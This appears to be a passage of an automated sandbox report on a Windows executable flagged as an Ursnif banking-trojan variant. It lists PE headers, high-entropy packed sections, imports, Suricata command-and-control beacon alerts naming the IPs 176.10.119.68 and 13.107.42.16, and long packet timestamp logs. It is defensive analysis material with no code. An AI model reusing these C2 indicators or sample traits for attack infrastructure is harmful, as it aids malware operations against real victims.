                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6b000 | 0xf3c | .reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0x7c | .rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                        .text | 0x1000 | 0xb8c0 | 0xc000 | False | 0.0830688476562 | data | 1.12975257539 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rdata | 0xd000 | 0xbea | 0x1000 | False | 0.2861328125 | data | 4.80028446978 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data | 0xe000 | 0x7b80 | 0x6000 | False | 0.380167643229 | data | 5.99739209586 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .crt | 0x16000 | 0x1dc01 | 0x1e000 | False | 0.988452148437 | data | 7.98104004555 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .erloc | 0x34000 | 0x2c91e | 0x2d000 | False | 0.988232421875 | data | 7.98142116636 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .rsrc | 0x61000 | 0x9f28 | 0xa000 | False | 0.602783203125 | data | 6.51666400073 | IMAGE_SCN_LNK_REMOVE, IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_TYPE_GROUP, IMAGE_SCN_LNK_INFO, IMAGE_SCN_MEM_PROTECTED, IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_NO_DEFER_SPEC_EXC, IMAGE_SCN_MEM_READ
                        .reloc | 0x6b000 | 0x133a | 0x2000 | False | 0.218994140625 | data | 3.75989927364 | IMAGE_SCN_TYPE_NOLOAD, IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_MEM_FARDATA, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_OTHER, IMAGE_SCN_LNK_INFO, IMAGE_SCN_LNK_OVER, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_LNK_COMDAT, IMAGE_SCN_GPREL, IMAGE_SCN_MEM_READ
                        Name | RVA | Size | Type | Language | Country
                        RT_BITMAP | 0x61360 | 0x666 | data | English | United States
                        RT_ICON | 0x619c8 | 0x485d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
                        RT_ICON | 0x66228 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544 | English | United States
                        RT_ICON | 0x687d0 | 0xea8 | data | English | United States
                        RT_ICON | 0x69678 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
                        RT_ICON | 0x69f20 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
                        RT_DIALOG | 0x6a488 | 0xb4 | data | English | United States
                        RT_DIALOG | 0x6a540 | 0x120 | data | English | United States
                        RT_DIALOG | 0x6a660 | 0x158 | data | English | United States
                        RT_DIALOG | 0x6a7b8 | 0x202 | data | English | United States
                        RT_DIALOG | 0x6a9c0 | 0xf8 | data | English | United States
                        RT_DIALOG | 0x6aab8 | 0xa0 | data | English | United States
                        RT_DIALOG | 0x6ab58 | 0xee | data | English | United States
                        RT_GROUP_ICON | 0x6ac48 | 0x4c | data | English | United States
                        RT_VERSION | 0x6ac98 | 0x290 | MS Windows COFF PA-RISC object file | English | United States
                        DLL | Import
                        ADVAPI32.dll | EnumServicesStatusExW, RegGetValueA, GetSidSubAuthorityCount
                        msvcrt.dll | fgetwc, strcoll
                        USER32.dll | GetClassNameA, LockWorkStation, GetMessagePos, GetWindowWord, IsWindow, GetClientRect, GetUpdateRgn
                        GDI32.dll | GetCharWidthFloatA, GetTextMetricsW, ExtEscape
                        OLEAUT32.dll | LoadTypeLibEx
                        KERNEL32.dll | GetBinaryTypeA, GetModuleFileNameA, LocalHandle, GetThreadLocale, GetFileTime, GlobalFlags, EnumResourceTypesA, GetCommState, GlobalFree
                        Description | Data
                        LegalCopyright | A Company. All rights reserved.
                        InternalName |
                        FileVersion | 1.0.0.0
                        CompanyName | A Company
                        ProductName |
                        ProductVersion | 1.0.0.0
                        FileDescription |
                        OriginalFilename | myfile.exe
                        Translation | 0x0409 0x04b0
                        Language of compilation system | Country where language is spoken
                        English | United States
                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                        05/25/22-11:27:05.996967 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49765 | 80 | 192.168.2.4 | 13.107.42.16
                        05/25/22-11:27:05.996967 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49765 | 80 | 192.168.2.4 | 13.107.42.16
                        05/25/22-11:27:28.182548 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49771 | 80 | 192.168.2.4 | 176.10.119.68
                        05/25/22-11:27:27.011665 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49771 | 80 | 192.168.2.4 | 176.10.119.68
                        May 25, 2022 11:27:26.470102072 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.470112085 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470129013 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470156908 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.470159054 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470165014 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.470199108 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470207930 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.470216990 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470235109 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470251083 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470263004 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470278025 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470287085 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.470294952 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470295906 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.470314980 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470323086 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.470331907 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470340014 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.470344067 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470360994 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470371008 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.470376015 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470393896 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470402956 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.470407009 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470421076 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.470478058 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470483065 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.470520973 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470540047 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470546007 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.470556974 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470573902 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470588923 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.470590115 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470606089 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470623016 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.470623970 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470635891 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470643997 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.470675945 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470674992 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.470720053 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470737934 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470746040 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.470748901 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470804930 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.470853090 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470870972 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470887899 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470905066 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470921040 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470937967 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470952988 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470969915 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470980883 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.470997095 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.471020937 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:26.471066952 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:26.471215963 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.011665106 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.030174017 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.299287081 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.299329042 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.299351931 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.299371004 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.299531937 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.299571991 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.299608946 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.299635887 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.299660921 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.299679041 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.299736023 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.299742937 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.299978971 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.300035954 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.300059080 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.300074100 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.300132990 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.300144911 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.313472986 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.313582897 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.313654900 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.313709974 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.313772917 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.313817024 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.313823938 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.314618111 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.316514015 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.317565918 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.317642927 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.317699909 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.317774057 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.317840099 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.317894936 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.317904949 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.317912102 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.318012953 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.318082094 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.318135023 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.318200111 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.318206072 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.318223000 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.318298101 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.318356037 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.318419933 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.318483114 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.318486929 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.318492889 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.318542004 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.318634033 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.318697929 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.318756104 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.318762064 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.318799973 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.318815947 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.318888903 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.318898916 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.318938971 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.318978071 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.319004059 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.319036961 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.319045067 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.319080114 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.319112062 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.319120884 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.319128990 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.327774048 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.327832937 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.327896118 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.327934980 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.327992916 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.327999115 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.328049898 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.328063011 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.328105927 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.328119040 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.328129053 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.328141928 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.328536034 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.331705093 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.331840992 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.331969023 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.331995010 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.332029104 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.332056046 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.332082987 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.332109928 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.332129002 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.332129955 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.332139969 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.332144976 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.332158089 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.334320068 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.334352970 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.334379911 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.334400892 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.334422112 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.334444046 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.335597038 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.335628033 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.335655928 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.335674047 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.335725069 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.335747957 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.337210894 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.337244987 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.337271929 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.337301016 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.337321997 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.337347984 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.337374926 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.337393999 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.337400913 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.337405920 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.337424994 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.337430954 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.337431908 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.337450981 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.337559938 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.337625980 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.337657928 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.337683916 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.337712049 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.337724924 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.337732077 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.337759018 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.337759972 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.337789059 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.337822914 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.337835073 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.337841034 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.337861061 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.337869883 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.337889910 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.337902069 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.337922096 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.337946892 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.337950945 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.337955952 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.337976933 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.338004112 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.338010073 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.338032961 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.338037014 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.338063002 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.338067055 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.338088036 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.338113070 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.338114023 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.338125944 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.338145971 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.338174105 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.338200092 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.338282108 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.342243910 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.342287064 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.342312098 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.342333078 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.342334986 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.342350006 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.342351913 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.342397928 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.345252991 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.345288992 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.345314980 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.345331907 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.345349073 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.345366001 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.345438004 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.345510006 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.346698046 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.346730947 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.346755028 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.346777916 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.346795082 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.346807957 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.346816063 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.346836090 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.346839905 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.346863985 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.346888065 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.346889019 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.346894026 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.346910000 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.346926928 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.346934080 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.346937895 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.346965075 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.348109007 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.348145008 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.348167896 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.348184109 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.348210096 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.348242044 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.350125074 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.350157022 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.350179911 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.350200891 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.350215912 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.350236893 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.350258112 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.350263119 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.350275993 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.350280046 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.350282907 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.350305080 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.350310087 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.350336075 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.350358963 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.350359917 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.350364923 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.350377083 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.350403070 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.350406885 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.353005886 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.353033066 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.353053093 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.353074074 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.353087902 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.353118896 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.353135109 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.353837967 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.353864908 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.353885889 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.353905916 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.353924990 CEST8049771176.10.119.68192.168.2.4
